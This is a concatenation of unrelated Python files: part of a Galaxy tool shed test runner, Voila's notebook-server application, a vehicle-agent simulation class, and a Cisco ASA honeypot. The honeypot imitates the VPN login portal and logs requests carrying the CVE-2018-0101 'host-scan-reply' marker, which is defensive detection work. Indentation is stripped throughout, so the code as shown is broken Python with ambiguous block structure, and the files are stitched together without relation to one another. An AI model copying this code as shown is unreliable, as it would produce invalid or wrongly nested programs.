galaxy_server = httpserver.serve( galaxywebapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % galaxy_test_port )
galaxy_server = httpserver.serve( galaxywebapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % \
( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_proxy_port
else:
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_port
t = threading.Thread( target=galaxy_server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded galaxy web server started" )
# We don't add the tests to the path until everything is up and running
new_path = [ os.path.join( cwd, 'test' ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
# ---- Find tests ---------------------------------------------------------
if tool_shed_test_proxy_port:
log.info( "Functional tests will be run against %s:%s" % ( tool_shed_test_host, tool_shed_test_proxy_port ) )
else:
log.info( "Functional tests will be run against %s:%s" % ( tool_shed_test_host, tool_shed_test_port ) )
if galaxy_test_proxy_port:
log.info( "Galaxy tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_proxy_port ) )
else:
log.info( "Galaxy tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_port ) )
success = False
try:
        # Passed to the test modules through environment variables set by this script; will leave a copy of ALL test validate files.
os.environ[ 'TOOL_SHED_TEST_HOST' ] = tool_shed_test_host
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
if tool_shed_test_file_dir:
os.environ[ 'TOOL_SHED_TEST_FILE_DIR' ] = tool_shed_test_file_dir
test_config = nose.config.Config( env=os.environ, ignoreFiles=ignore_files, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the tests.
result = run_tests( test_config )
success = result.wasSuccessful()
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
if tool_shed_server:
log.info( "Shutting down embedded web server" )
tool_shed_server.server_close()
tool_shed_server = None
log.info( "Embedded web server stopped" )
if toolshedapp:
log.info( "Shutting down tool shed app" )
toolshedapp.shutdown()
toolshedapp = None
log.info( "Embedded tool shed application stopped" )
if 'TOOL_SHED_TEST_OMIT_GALAXY' not in os.environ:
if galaxy_server:
log.info( "Shutting down galaxy web server" )
galaxy_server.server_close()
galaxy_server = None
log.info( "Embedded galaxy server stopped" )
if galaxyapp:
log.info( "Shutting down galaxy app" )
galaxyapp.shutdown()
galaxyapp = None
log.info( "Embedded galaxy application stopped" )
if 'TOOL_SHED_TEST_NO_CLEANUP' not in os.environ:
try:
for dir in [ tool_shed_test_tmp_dir ]:
if os.path.exists( dir ):
log.info( "Cleaning up temporary files in %s" % dir )
shutil.rmtree( dir )
except:
pass
if success:
return 0
else:
return 1
def __copy_database_template( source, db_path ):
"""
Copy a 'clean' sqlite template database (from file or URL) to specified
database path.
"""
os.makedirs( os.path.dirname( db_path ) )
if os.path.exists( source ):
shutil.copy( source, db_path )
assert os.path.exists( db_path )
elif source.startswith("http"):
urllib.urlretrieve( source, db_path )
else:
raise Exception( "Failed to copy database template from source %s" % source )
if __name__ == "__main__":
try:
sys.exit( main() )
except Exception, e:
log.exception( str( e ) )
exit(1)
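# Usage sketch (assumption): this runner is normally driven by Galaxy's test
# wrapper scripts, but it can also be invoked directly. The embedded servers
# and databases are controlled through the environment variables read in
# main() above (TOOL_SHED_TEST_HOST, TOOL_SHED_TEST_PORT, GALAXY_TEST_HOST,
# GALAXY_TEST_PORT, GALAXY_TEST_DB_TEMPLATE, TOOL_SHED_TEST_OMIT_GALAXY,
# TOOL_SHED_TEST_NO_CLEANUP, ...), and any remaining command-line arguments
# are handed to nose via test_config.configure( sys.argv ).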
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voila Contributors #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
from zmq.eventloop import ioloop
import gettext
import io
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import MappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import path_regex
from jupyter_server.utils import url_path_join
from jupyter_server.services.config import ConfigManager
from jupyter_server.base.handlers import FileFindHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, notebook_path_regex
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutePreprocessor
from .exporter import VoilaExporter
from .csspreprocessor import VoilaCSSPreprocessor
ioloop.install()
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': ({'Voila': {'log_level': logging.DEBUG}}, _("Set the log level to logging.DEBUG")),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the voila server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
            'Will autoreload the server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration,
VoilaExecutePreprocessor,
VoilaExporter,
VoilaCSSPreprocessor
]
connection_dir_root = Unicode(
config=True,
help=_(
            'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for voila API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
            'Path prefix for voila API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with voila'
)
)
nbconvert_template_paths = List(
[],
config=True,
help=_(
'path to nbconvert templates'
)
)
template_paths = List(
[],
allow_none=True,
config=True,
help=_(
            'paths to jinja templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def initialize(self, argv=None):
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# but that cli config has preference, so we overwrite with that
self.update_config(self.cli_config)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
collect_template_paths(
self.nbconvert_template_paths,
self.static_paths,
self.template_paths,
self.voila_configuration.template)
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('nbconvert template paths:\n\t%s', '\n\t'.join(self.nbconvert_template_paths))
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = MappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
        # we create a config manager that loads both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
}
)
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/tree' + path_regex), VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/render' + notebook_path_regex), VoilaHandler,
{
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
self.kernel_manager.shutdown_all()
def listen(self):
self.app.listen(self.port)
self.log.info('Voila is running at:\n%s' % self.display_url)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
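# Example invocations (based on the flags and aliases defined above; exact
# option spelling may vary between voila releases):
#   voila example.ipynb --port=8866 --no-browser
#   voila /path/to/notebooks/ --debug
# Passing a single notebook serves it at the base URL; passing a directory
# (or nothing) registers the tree and render handlers instead (see start()).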
|
agent.py
|
import time
import math
from threading import Thread
import vehicle
msgHeader = "[AGENT]: "
class Agent():
def __init__(self, ID, agentType="robot", vehicleType="car", strategyFile=None):
self.ID = str(ID)
if vehicleType.lower() == "car":
self.vehicle = vehicle.Car(self)
elif vehicleType.lower() == "truck":
self.vehicle = vehicle.Truck(self)
elif vehicleType.lower() == "motorcycle":
self.vehicle = vehicle.Motorcycle(self)
elif vehicleType.lower() == "bicycle":
self.vehicle = vehicle.Bicycle(self)
else:
print(msgHeader + "Could not initialise Agent " + self.ID + " with vehicle type '" + vehicleType + "'.")
self.vehicle = vehicle.Car(self)
self.worldKnowledge = {}
self.strategy = None
if strategyFile is not None:
try:
self.strategy = import_file("strategy", strategyFile)
print(msgHeader + "Successfully loaded the strategy file for Agent " + self.ID + ".")
except:
print(msgHeader + "Could not load the strategy file for Agent " + self.ID + ". (Fatal)")
exit()
self.stopped = False
def start(self):
t_process = Thread(target=self.update)
t_process.daemon = True
t_process.start()
return self
def update(self):
while True:
if self.stopped or not self.strategy:
return
self.strategy.make_decision(self)
time.sleep(0.2)
def stop(self):
self.vehicle.stop()
self.stopped = True
def update_world_knowledge(self, worldData):
for key in self.worldKnowledge:
if key in worldData:
self.worldKnowledge[key] = worldData[key]
def aim_speed(self, speed):
cspeed = self.vehicle.current_speed
if (cspeed is None):
cspeed = 0
if (speed > cspeed):
diff = speed - cspeed
if (diff > self.vehicle.max_acceleration):
diff = self.vehicle.max_acceleration
self.vehicle.set_speed(cspeed + diff)
else:
diff = cspeed - speed
if (diff > self.vehicle.max_deceleration):
diff = self.vehicle.max_deceleration
self.vehicle.set_speed(cspeed - diff)
def aim_angle(self, angle):
cangle = self.vehicle.orientation
if (cangle is None):
cangle = 0
diff = int(math.fabs(angle - cangle))
if (diff > 180):
diff = 360 - diff
if (cangle < angle):
da = -diff
else:
da = diff
else:
if (cangle < angle):
da = diff
else:
da = -diff
self.vehicle.set_angle(da // 3)
def get_vector_between_points(self, x1, y1, x2, y2):
if (x1 != None and y1 != None):
dx = x2 - x1
dy = y2 - y1
dist = int(math.sqrt(dx * dx + dy * dy))
theta = 0
if (dx != 0):
theta = math.atan(dy / dx) * (180 / math.pi)
if (dx == 0):
if (dy <= 0):
theta = 0
else:
theta = 180
elif (dy == 0):
if (dx < 0):
theta = 270
else:
theta = 90
elif (dx > 0 and dy > 0):
theta = theta + 90
elif (dx > 0 and dy < 0):
theta = theta + 90
elif (dx < 0 and dy > 0):
theta = theta + 270
elif (dx < 0 and dy < 0):
theta = theta + 270
return (dist, theta)
return (None, None)
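    # Angle convention (inferred from the branches above): 0 degrees points
    # "north" (towards smaller y, i.e. up on a screen where y grows downward),
    # 90 is east, 180 is south and 270 is west; distances are truncated to
    # whole units.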
# Return Distance and Angle to current waypoint. Angle must be degrees clockwise from north
def get_vector_to_waypoint(self):
if (self.vehicle.position[0] != None and self.vehicle.position[1] != None):
wpi = self.get_waypoint_index()
if (wpi != None):
if (self.worldKnowledge['waypoints'] != []):
x1 = self.vehicle.position[0]
y1 = self.vehicle.position[1]
x2 = self.worldKnowledge['waypoints'][wpi][0]
y2 = self.worldKnowledge['waypoints'][wpi][1]
return self.get_vector_between_points(x1, y1, x2, y2)
return (None, None)
# Return current waypoint index
def get_waypoint_index(self):
return self.worldKnowledge['waypoint_index']
# Set current waypoint index
def set_waypoint_index(self, wp):
mmax = len(self.worldKnowledge['waypoints']) - 1
if (wp > mmax):
wp = 0
if (wp < 0):
wp = mmax
self.worldKnowledge['waypoint_index'] = wp
def import_file(full_name, path):
from importlib import util
spec = util.spec_from_file_location(full_name, path)
mod = util.module_from_spec(spec)
spec.loader.exec_module(mod)
return mod
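# --- Illustrative only --------------------------------------------------------
# A minimal strategy-module sketch (assumption: a strategy file only needs to
# expose make_decision(agent), since Agent.update() calls
# self.strategy.make_decision(self) roughly every 0.2 seconds). Saved as a
# separate file and passed via strategyFile, it could look like this:
def _example_make_decision(agent):
    # Head towards the current waypoint and stop once it is (almost) reached.
    dist, angle = agent.get_vector_to_waypoint()
    if dist is None:
        agent.aim_speed(0)
        return
    agent.aim_angle(angle)
    # Speed/distance units depend on the vehicle model (assumption).
    agent.aim_speed(2 if dist > 10 else 0)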
|
asa_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import socket
import logging
import threading
from io import BytesIO
from xml.etree import ElementTree
from http.server import HTTPServer
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler
import ike_server
import datetime
class NonBlockingHTTPServer(ThreadingMixIn, HTTPServer):
pass
class hpflogger:
def __init__(self, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose):
self.hpfserver=hpfserver
self.hpfport=hpfport
self.hpfident=hpfident
self.hpfsecret=hpfsecret
self.hpfchannel=hpfchannel
self.serverid=serverid
self.hpc=None
self.verbose=verbose
        if (self.hpfserver and self.hpfport and self.hpfident and self.hpfsecret and self.hpfchannel and self.serverid):
import hpfeeds
try:
self.hpc = hpfeeds.new(self.hpfserver, self.hpfport, self.hpfident, self.hpfsecret)
logger.debug("Logging to hpfeeds using server: {0}, channel {1}.".format(self.hpfserver, self.hpfchannel))
except (hpfeeds.FeedException, socket.error, hpfeeds.Disconnect):
logger.critical("hpfeeds connection not successful")
def log(self, level, message):
if self.hpc:
if level in ['debug', 'info'] and not self.verbose:
return
self.hpc.publish(self.hpfchannel, "["+self.serverid+"] ["+level+"] ["+datetime.datetime.now().isoformat() +"] " + str(message))
def header_split(h):
return [list(map(str.strip, l.split(': ', 1))) for l in h.strip().splitlines()]
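# For reference: header_split turns a block of "Key: Value" lines into
# [key, value] pairs, e.g.
#   header_split("Content-Type: text/html\nPragma: no-cache")
#   -> [['Content-Type', 'text/html'], ['Pragma', 'no-cache']]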
class WebLogicHandler(SimpleHTTPRequestHandler):
logger = None
hpfl = None
protocol_version = "HTTP/1.1"
EXPLOIT_STRING = b"host-scan-reply"
RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">9.0(1)</version>
<error id="98" param1="" param2="">VPN Server could not parse request.</error>
</config-auth>"""
basepath = os.path.dirname(os.path.abspath(__file__))
alert_function = None
def setup(self):
SimpleHTTPRequestHandler.setup(self)
self.request.settimeout(3)
def send_header(self, keyword, value):
if keyword.lower() == 'server':
return
SimpleHTTPRequestHandler.send_header(self, keyword, value)
def send_head(self):
# send_head will return a file object that do_HEAD/GET will use
# do_GET/HEAD are already implemented by SimpleHTTPRequestHandler
filename = os.path.basename(self.path.rstrip('/').split('?', 1)[0])
if self.path == '/':
self.send_response(200)
for k, v in header_split("""
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn_portal=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnSharePoint=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; path=/; secure
Set-Cookie: sdesktop=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
"""):
self.send_header(k, v)
self.end_headers()
return BytesIO(b'<html><script>document.location.replace("/+CSCOE+/logon.html")</script></html>\n')
elif filename == 'asa': # don't allow dir listing
return self.send_file('wrong_url.html', 403)
else:
return self.send_file(filename)
def redirect(self, loc):
self.send_response(302)
for k, v in header_split("""
Content-Type: text/html
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Location: %s
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
""" % (loc,)):
self.send_header(k, v)
self.end_headers()
def do_GET(self):
if self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.startswith('/+CSCOE+/logon.html?') and 'reason=1' in self.path:
self.wfile.write(self.send_file('logon_failure').getvalue())
return
SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
data_len = int(self.headers.get('Content-length', 0))
data = self.rfile.read(data_len) if data_len else b''
body = self.RESPONSE
if self.EXPLOIT_STRING in data:
xml = ElementTree.fromstring(data)
payloads = []
for x in xml.iter('host-scan-reply'):
payloads.append(x.text)
self.alert_function(self.client_address[0], self.client_address[1], payloads)
elif self.path == '/':
self.redirect('/+webvpn+/index.html')
return
elif self.path == '/+CSCOE+/logon.html':
self.redirect('/+CSCOE+/logon.html?fcadbadd=1')
return
elif self.path.split('?', 1)[0] == '/+webvpn+/index.html':
with open(os.path.join(self.basepath, 'asa', "logon_redir.html"), 'rb') as fh:
body = fh.read()
self.send_response(200)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(body)
return
def send_file(self, filename, status_code=200, headers=[]):
try:
with open(os.path.join(self.basepath, 'asa', filename), 'rb') as fh:
body = fh.read()
self.send_response(status_code)
for k, v in headers:
self.send_header(k, v)
if status_code == 200:
for k, v in header_split("""
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; secure
X-Transcend-Version: 1
"""):
self.send_header(k, v)
self.send_header('Content-Length', int(len(body)))
self.send_header('Content-Type', 'text/html')
self.end_headers()
return BytesIO(body)
except IOError:
return self.send_file('wrong_url.html', 404)
def log_message(self, format, *args):
self.logger.debug("%s - - [%s] %s" %
(self.client_address[0],
self.log_date_time_string(),
format % args))
self.hpfl.log('debug', "%s - - [%s] %s" %
(self.client_address[0],
self.log_date_time_string(),
format % args))
def handle_one_request(self):
"""Handle a single HTTP request.
        Overridden to not send 501 errors
"""
self.close_connection = True
try:
self.raw_requestline = self.rfile.readline(65537)
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
self.close_connection = 1
return
if not self.raw_requestline:
self.close_connection = 1
return
if not self.parse_request():
# An error code has been sent, just exit
return
mname = 'do_' + self.command
if not hasattr(self, mname):
self.log_request()
self.close_connection = True
return
method = getattr(self, mname)
method()
self.wfile.flush() # actually send the response if not already done.
except socket.timeout as e:
# a read or a write timed out. Discard this connection
self.log_error("Request timed out: %r", e)
self.close_connection = 1
return
if __name__ == '__main__':
import click
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.info('info')
@click.command()
@click.option('-h', '--host', default='0.0.0.0', help='Host to listen')
@click.option('-p', '--port', default=8443, help='Port to listen', type=click.INT)
@click.option('-i', '--ike-port', default=5000, help='Port to listen for IKE', type=click.INT)
@click.option('-s', '--enable_ssl', default=False, help='Enable SSL', is_flag=True)
@click.option('-c', '--cert', default=None, help='Certificate File Path (will generate self signed '
'cert if not supplied)')
@click.option('-v', '--verbose', default=False, help='Verbose logging', is_flag=True)
# hpfeeds options
@click.option('--hpfserver', default=os.environ.get('HPFEEDS_SERVER'), help='HPFeeds Server')
@click.option('--hpfport', default=os.environ.get('HPFEEDS_PORT'), help='HPFeeds Port', type=click.INT)
@click.option('--hpfident', default=os.environ.get('HPFEEDS_IDENT'), help='HPFeeds Ident')
@click.option('--hpfsecret', default=os.environ.get('HPFEEDS_SECRET'), help='HPFeeds Secret')
@click.option('--hpfchannel', default=os.environ.get('HPFEEDS_CHANNEL'), help='HPFeeds Channel')
    @click.option('--serverid', default=os.environ.get('SERVERID'), help='Server ID')
def start(host, port, ike_port, enable_ssl, cert, verbose, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid):
"""
A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101,
a DoS and remote code execution vulnerability
"""
hpfl=hpflogger(hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose)
def alert(cls, host, port, payloads):
logger.critical({
'src': host,
'spt': port,
'data': payloads,
})
#log to hpfeeds
hpfl.log("critical", {
'src': host,
'spt': port,
'data': payloads,
})
if verbose:
logger.setLevel(logging.DEBUG)
requestHandler = WebLogicHandler
requestHandler.alert_function = alert
requestHandler.logger = logger
requestHandler.hpfl = hpfl
def log_date_time_string():
"""Return the current time formatted for logging."""
now = time.time()
year, month, day, hh, mm, ss, x, y, z = time.localtime(now)
s = "%02d/%3s/%04d %02d:%02d:%02d" % (day, requestHandler.monthname[month], year, hh, mm, ss)
return s
def ike():
ike_server.start(host, ike_port, alert, logger, hpfl)
t = threading.Thread(target=ike)
t.daemon = True
t.start()
httpd = HTTPServer((host, port), requestHandler)
if enable_ssl:
import ssl
if not cert:
import gencert
cert = gencert.gencert()
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=cert, server_side=True)
logger.info('Starting server on port {:d}/tcp, use <Ctrl-C> to stop'.format(port))
hpfl.log('info', 'Starting server on port {:d}/tcp, use <Ctrl-C> to stop'.format(port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
logger.info('Stopping server.')
hpfl.log('info', 'Stopping server.')
httpd.server_close()
start()
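# Example invocation (assumed; see the click options above):
#   python3 asa_server.py --port 8443 --enable_ssl --verbose
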